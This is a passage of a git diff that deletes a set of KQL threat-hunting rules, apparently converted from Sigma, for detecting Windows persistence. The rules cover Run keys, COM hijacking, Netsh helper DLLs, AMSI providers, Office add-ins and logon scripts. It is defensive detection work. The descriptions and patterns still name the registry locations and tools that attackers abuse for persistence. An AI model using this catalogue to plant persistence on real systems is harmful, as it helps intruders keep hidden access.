-| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql b/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
deleted file mode 100644
index a1a02521..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/28
-// Level: medium
-// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "reg" and ProcessCommandLine contains " ADD " and ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Using_DebugPath.kql b/Persistence/Potential_Persistence_Using_DebugPath.kql
deleted file mode 100644
index 0a216f80..00000000
--- a/Persistence/Potential_Persistence_Using_DebugPath.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects potential persistence using Appx DebugPath
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql b/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
deleted file mode 100644
index 28f8a0f1..00000000
--- a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/01/01
-// Level: medium
-// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
-This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
-This can be potentially abused as a persistence mechanism.
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql b/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
deleted file mode 100644
index 33dfb797..00000000
--- a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
-The entries found under App Paths are used primarily for the following purposes.
-First, to map an application's executable file name to that file's fully qualified path.
-Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
-
-// Tags: attack.persistence, attack.t1546.012
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AutodialDLL.kql b/Persistence/Potential_Persistence_Via_AutodialDLL.kql
deleted file mode 100644
index bea17672..00000000
--- a/Persistence/Potential_Persistence_Via_AutodialDLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
deleted file mode 100644
index f0cfbb39..00000000
--- a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql b/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
deleted file mode 100644
index b6360528..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") and RegistryKey contains "\\CLSID" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql b/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
deleted file mode 100644
index b9526492..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
-// Date: 2020/04/14
-// Level: medium
-// Description: Detects potential COM object hijacking leveraging the COM Search Order
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CLSID" and RegistryKey endswith "\\InprocServer32\\(Default)") and (not(((RegistryValueData endswith ":\\Windows\\system32\\dnssdX.dll" or RegistryValueData endswith ":\\Windows\\SysWOW64\\dnssdX.dll") or ((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (RegistryValueData contains "\\AppData\\Roaming\\Dropbox\\" and (RegistryValueData contains "\\DropboxExt64." and RegistryValueData contains ".dll")) or InitiatingProcessFolderPath endswith ":\\WINDOWS\\SYSTEM32\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdateComRegisterShell64.exe" or RegistryValueData contains ":\\WINDOWS\\system32\\GamingServicesProxy.dll" or (RegistryValueData contains "%%systemroot%%\\system32\\" or RegistryValueData contains "%%systemroot%%\\SysWow64\\") or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\SecurityHealthService.exe" or ((InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\regsvr32.exe") and RegistryKey endswith "\\InProcServer32\\(Default)") or RegistryValueData contains "\\FileRepository\\nvmdi.inf" or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" or RegistryValueData contains "\\FileCoAuthLib64.dll" or RegistryValueData contains "\\FileSyncShell64.dll" or RegistryValueData contains "\\FileSyncApi64.dll") or (RegistryValueData contains ":\\Windows\\System32\\Autopilot.dll" and InitiatingProcessFolderPath endswith 
":\\Windows\\System32\\poqexec.exe") or RegistryValueData endswith ":\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll" or RegistryValueData contains ":\\ProgramData\\Microsoft\\" or (RegistryValueData contains ":\\Program Files\\" or RegistryValueData contains ":\\Program Files (x86)\\") or (RegistryValueData endswith ":\\Windows\\pyshellext.amd64.dll" or RegistryValueData endswith ":\\Windows\\pyshellext.dll") or (RegistryValueData contains ":\\Windows\\System32\\SecurityHealth" and InitiatingProcessFolderPath endswith ":\\Windows\\system32\\SecurityHealthService.exe") or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\" and RegistryValueData contains "\\Microsoft.Teams.AddinLoader.dll") or RegistryValueData endswith "TmopIEPlg.dll" or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\wuauclt.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql b/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
deleted file mode 100644
index df77155d..00000000
--- a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql b/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
deleted file mode 100644
index 5d4ed302..00000000
--- a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
-The disk cleanup manager is part of the operating system. It displays the dialog box […]
-The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or 
RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
deleted file mode 100644
index 617d3ee9..00000000
--- a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql b/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
deleted file mode 100644
index 4548866a..00000000
--- a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/15
-// Level: high
-// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
-// Tags: attack.persistence, attack.t1137.006
-DeviceRegistryEvents
-| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_GlobalFlags.kql b/Persistence/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Persistence/Potential_Persistence_Via_GlobalFlags.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql b/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
deleted file mode 100644
index 8aa8287b..00000000
--- a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
-The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
deleted file mode 100644
index b8e4b63b..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: high
-// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
-// Tags: attack.persistence, attack.t1037.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql b/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
deleted file mode 100644
index da19a9b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
-In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
deleted file mode 100644
index c04b65b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/11
-// Level: high
-// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
-// Tags: attack.persistence, attack.t1137.006
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
deleted file mode 100644
index 8cd7e149..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: high
-// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
-// Tags: attack.persistence, attack.t1137
-DeviceFileEvents
-| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Mpnotify.kql b/Persistence/Potential_Persistence_Via_Mpnotify.kql
deleted file mode 100644
index aa6f3b3c..00000000
--- a/Persistence/Potential_Persistence_Via_Mpnotify.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql b/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
deleted file mode 100644
index 2439e7ac..00000000
--- a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: high
-// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
deleted file mode 100644
index 95c6d258..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Anish Bogati
-// Date: 2023/11/28
-// Level: medium
-// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql b/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
deleted file mode 100644
index 7f67469f..00000000
--- a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql b/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
deleted file mode 100644
index af2c5ac8..00000000
--- a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/10
-// Level: medium
-// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Form.kql b/Persistence/Potential_Persistence_Via_Outlook_Form.kql
deleted file mode 100644
index 05b0a258..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Form.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects the creation of a new Outlook form which can contain malicious code
-// Tags: attack.persistence, attack.t1137.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql b/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
deleted file mode 100644
index 286ac042..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/09
-// Level: high
-// Description: Detects potential persistence activity via outlook home pages.
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Software\\Microsoft\\Office" or RegistryKey contains "\\Outlook\\WebView") and RegistryKey endswith "\\URL") and (RegistryKey contains "\\Calendar" or RegistryKey contains "\\Inbox")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql b/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
deleted file mode 100644
index 8bbd5aeb..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/04/05
-// Level: high
-// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceRegistryEvents
